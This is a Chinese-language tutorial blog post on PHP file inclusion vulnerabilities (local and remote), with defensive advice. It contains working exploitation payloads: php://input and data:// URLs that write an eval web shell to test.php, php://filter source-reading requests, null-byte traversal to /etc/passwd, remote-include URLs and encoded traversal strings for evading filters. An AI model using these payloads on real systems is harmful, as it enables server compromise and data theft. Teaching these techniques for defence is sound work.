Web安全学习之文件包含漏洞利用

这一篇主要来聊一聊PHP的文件包含漏洞，主要包括本地文件包含（Local File Inclusion，LFI）、远程文件包含（Remote File Inclusion， RFI）和PHP伪协议的利用。

文件包含的基本概念

严格来说，文件包含漏洞是代码注入的一种，其原理就是注入一段用户能控制的脚本或代码，使服务器端执行。至于文件包含，也就是一种“外部数据流包含”，这个外部数据流可以是文件，也可以是POST数据流的形式。

对于PHP具体而言，有４个可利用的函数：

1
2
3
4

require()
require_once()
include()
include_once()

当使用这4个函数包含一个新文件时该文件将作为PHP代码执行，PHP内核并不会判断该被包含的文件是什么类型。也就是说，如果被包含的txt文件、图片文件、远程URL都会作为PHP代码被执行。

举一个最简单的例子来看看：

1
2
3

<?php
include($_GET[test]);    
?>

fortest.txt文件内容：

1
2
3
4

for test
<?php
phpinfo();
?>

页面结果：

要想成功利用文件包含漏洞，需要满足下面两个条件：

1. include()等函数通过动态变量的方式引入需要包含的文件；
2. 用户能控制该动态变量。

远程文件包含

如果PHP的配置选项allow_url_include为ON的话，则include/require函数是可以加载远程文件的，这种漏洞称为远程文件包含漏洞，比如：

1
2
3
4

<?php
    $basePath = $_GET['path'];
	require_once $basePath . "/action/m_share.php"
?>

上面的代码看似将路径的后半段已经规定了，但利用HTTP参数还是有办法绕过：

1

http://localhost/FileInclude/index.php?path=http://localhost/test/solution.php?

所以实际的执行代码就是：

1

require_once "http://localhost/FileInclude/index.php?path=http://localhost/test/solution.php?/action/m_share.php"

即，问号"?"后面的代码被解释成URL的querystring，这也是一种"截断"思想，和%00一样。

防御方法：关闭远程文件包含的配置错误，即allow_url_include = Off

本地文件包含

能过打开并包含本地文件的漏洞，被称为本地文件包含漏洞。

看到这里，利用远程文件包含我们可以执行攻击者的任意代码，而本地文件包含漏洞只能查看或运行本地文件。但是，其实我们可以使用PHP的伪协议等方式来利用本地文件包含漏洞，接下来讲的是如下几种利用方式：

• PHP伪协议（较为通用）
• 包含Session文件
• 包含日志（较为通用）
• 包含environ文件
• 包含临时文件
• 包含上传文件

PHP伪协议

php://协议

1
2

php://input
php://filter

php://input用于执行PHP代码，php://filter用于读取源码。

php://filter

php://filter是一种元封装器，设计用于"数据流打开"时的"筛选过滤"应用，对本地磁盘文件进行读写。简单来讲就是可以在执行代码前将代码换个方式读取出来，只是读取，不需要开启allow_url_include。

用法：?file=php://filter/convert.base64-encode/resource=xxx.php

假设页面的源代码index.php为：

1
2
3
4
5
6
7
8
9
10
11
12
13
14

<html>
    <title>asdf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
?>
</html>

1
2
3

url: http://localhost/test/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
result: PD9waHAgc3lzdGVtKCdpcGNvbmZpZycpOz8+

base64解密就可以看到内容，这里如果不进行base64_encode，则被include进来的代码就会被执行，导致看不到源代码。

php://input

php://input协议主要用于访问各个输入/输出流。CTF中经常使用file_get_contents获取php://input内容(POST)，需要开启allow_url_include，并且当enctype="multipart/form-data"的时候 php://input是无效的。

利用方式：?file=php://input 数据利用POST传过去

碰到file_get_contents()就要想到用php://input绕过，因为php伪协议也是可以利用http协议的，即可以使用POST方式传数据。

假设页面源代码为：

1
2
3
4
5
6
7

<?php
$file = $_GET['file'];
if (@file_get_content($file) == 'meizijiu') {
    echo $flag;
}
?>

直接使用Hackbar工具POST数据：

另外还可以写入一句话：

1
2
3
4
5
6

http://www.inc.com/inc.php?file=php://input
post数据:
<?php 
echo file_put_contents("test.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbJ2NjJ10pPz4="));
?>

data://协议

php.ini：allow_url_include=On、allow_url_fopen()都为On

利用data://伪协议进行代码执行的思路原理和php://是类似的，都是利用了PHP中的流的概念，将原本的include的文件流重定向到了用户可控制的输入流中。

页面示例代码：

1
2
3
4
5

<?php
echo 'for test';
include($_GET['file']);
?>

1
2
3
4
5
6

http://www.inc.com/inc.php?file=data://text/plain,<?php phpinfo()?>
http://www.inc.com/inc.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
http://www.inc.com/inc.php?file=data:text/plain,<?php phpinfo()?>
http://www.inc.com/inc.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
http://www.inc.com/inc.php?file=data://text/plain;base64,PD9waHAgZWNobyBmaWxlX3B1dF9jb250ZW50cygidGVzdC5waHAiLGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFnWlhaaGJDZ2tYMUJQVTFSYkoyTmpKMTBwUHo0PSIpKTs/Pg==

最后一个URL使用file_put_contents()函数将<?php eval($_POST['cc'])?>写到了test.php文件当中，如图：

phar://协议

php版本 ≥ 5.3

phar://：PHP 归档，常常跟文件包含，文件上传结合着考察。当文件上传仅仅校验mime类型与文件后缀，可以通过以下方式进行利用。

利用方式：写入一句话shell.php -> 压缩为shell.zip -> 修改后缀为shell.jpg ->上传到网站 -> phar://shell.jpg/shell.php

假设有个文件phpinfo.txt，其内容为<?php phpinfo(); ?>，打包成zip压缩包，如下：

指定绝对路径：

index.php?file=phar://D:/phpStudy/WWW/fileinclude/test.zip/phpinfo.txt

zip://协议

php版本 ≥ 5.3

利用和构造zip包的方法同phar://协议，但使用zip协议，需要指定绝对路径，同时将#编码为%23，之后填上压缩包内的文件。

1
2

index.php?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt

包含Session文件

前提条件：Session文件路径已知，且其中内容的部分可控。

首先第一个条件：Session的文件路径可以在php.ini中的session.save_handler字段查看到：

一般而言，session文件的存放位置为：

• /var/lib/php/sess_PHPSESSID
• /tmp/sess_PHPSESSID
• /tmp/sessions/sess_PHPSESSID

第二个条件：内容可控，这个要求较为苛刻，有些时候，可以先包含进session文件，观察里面的内容，然后根据里面的字段来发现可控的变量，从而利用变量来写入payload，并之后再次包含从而执行php代码。

包含日志文件

前提条件：要知道服务器日志的存储路径，且日志文件可读。

服务器一般回在Web Server的access_log里记录客户端的请求信息，在error_log里记录出错信息。所以攻击者可以间接地将PHP代码写入日志文件，在文件包含时，只需要包含日志文件即可。

但如果是直接发起请求，会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改。

正常的PHP代码已经写入了 /var/log/apache2/access.log。然后进行包含即可。

包含environ文件

/proc/self/environ文件里面有Web进程运行时的环境变量，其中很多都是用户可以控制的，最常见的做法就是在User-Agent中注入PHP代码。

这里有很完整的利用过程说明： https://www.exploit-db.com/papers/12886

包含临时文件

以上这些方法都要求PHP能过包含这些不处于Web目录下的文件，如果PHP设置了open_basedir，则很可能会使得攻击失效。

php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前，利用竞争即可包含该临时文件。

由于包含需要知道包含的文件名。一种方法是进行暴力猜解，linux下使用的随机函数有缺陷，而window下只有65535中不同的文件名，所以这个方法是可行的。

另一种方法是配合phpinfo页面的php variables，可以直接获取到上传文件的存储路径和临时文件名，直接包含即可。这个方法可以参考[LFI With PHPInfo Assistance](https://www.insomniasec.com/downloads/publications/LFI With PHPInfo Assistance.pdf)

包含上传文件

就给一道CTF的题吧，最近在玩这个，膜拜一下大佬写的脚本。

XMAN夏令营-2017-babyweb-writeup

绕过方式

比如下面这段代码：

1
2
3
4
5
6
7

<?php
$file = $_GET['file'];
if (file_exists('/home/wwwrun/'.$file.'.php')) {
    include '/home/wwwrun/'.$file.'.php';
}
?>

这段代码把inlcude路径的前缀部分、后缀部分都给控制住了。相比于连路径的前缀都由用户控制的那种漏洞已经安全多了。但是这里存在几个问题。

00字符截断

这种方式需要 PHP版本<=5.2

用户能够控制file参数，当file的值为../../etc/passwd\0时，相当于执行了include '/home/wwwrun/../../etc/passwd'这条语句。

如果不适用\0截断的话，被包含的文件实际上是/etc/passwd.php，但这个文件自然是不存在的。所以在这个地方，攻击者只要在最后加入一个0字节（\x00），就能截断file变量之后的字符串。

如果是通过Web输入，只需要UrlEencode变为：

1
2

../../etc/passwd%00

防御方式：过滤\00截断字符，过滤代码如下：

1
2
3
4
5
6
7
8
9
10
11

<?php
function getVal($name)
{
    $value = isset($_GET[$name]) ? $_GET[$name] : null;
    if (is_string($value))
    {
        $value = str_replace("\0", '', $value);
    }
}
?>

超长字符截断

目录字符串在Windows下256字节、Linux下4096字节时，会达到最大值，最大值之后的字符被丢弃。可以通过./的方式构造目录：

1
2
3
4

././././././././././././abc
//////////////////abc
../1/abc../1/abc../1/abc

目录遍历

除了这种攻击方式，还可以使用"…/…/…/“这样的方式来返回到上层目录中，这种方式又被称为"目录遍历(Path Traversal)”。常见的目录遍历漏洞，还可以通过不同的编码方式来绕过一些服务器端的防御逻辑(WAF) ：

1
2
3
4
5
6
7
8
9

%2e%2e%2f    ->    ../
%2e%2e/     ->    ../
..%2f     ->    ../
%2e%2e%5c    ->    ..\
%2e%2e%\    ->    ..\
..%5c     ->    ..\
%252e%252e%255c    ->    ..\
..%255c     ->    ..\

防御方式

目录遍历漏洞是一种跨越目录读取文件的方法，但当PHP配置了open_basedir时，将很好地保护服务器，使得这种攻击无效。
open_basedir的作用是限制在某个特定目录下PHP能打开的文件。

需要注意的是，open_basedir的值是目录的前缀，如果设置如下：

1	open_basedir = /home/aaa

那么以下的目录都是被允许的：

1 2 3

/home/aaa /home/aaa/bbb /home/aaa/ccc

如果要限定一个指定的目录，则需要在后面加上一个/：

1	>open_basedir = /home/aaa/

URL绕过

query（?）

1

index.php?file=http://remoteaddr/remoteinfo.txt? 

则包含的文件为 http://remoteaddr/remoteinfo.txt?/test/test.php 。

问号后面的部分/test/test.php，也就是指定的后缀被当作query从而被绕过。

fragment(#)

1

index.php?file=http://remoteaddr/remoteinfo.txt%23

则包含的文件为http://remoteaddr/remoteinfo.txt#/test/test.php 。

问号后面的部分/test/test.php，也就是指定的后缀被当作fragment从而被绕过。注意需要把#进行url编码为%23。

防御方式

综上，要防御LFI的漏洞，应该尽量避免包含动态的变量，尤其是用户可以控制的变量。一种变通的方式，则是使用枚举：

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

<?php
    $file = $_GET['file'];

    //whitelisting possible values
    switch($file)
    {
        case "main":
        case "foo":
        case "bar":
            include "/home/wwwrun/include" . $file . ".php";
            break;
        default:
            include "/home/wwwrun/include/main.php";
    }
?>

Reference

• 《白帽子讲Web安全》
• PHP文件包含
• [LFI、RFI、PHP封装协议安全问题学习
• LFI以及RFI(文件包含)伪协议利用小技巧
• LFIBoomCTF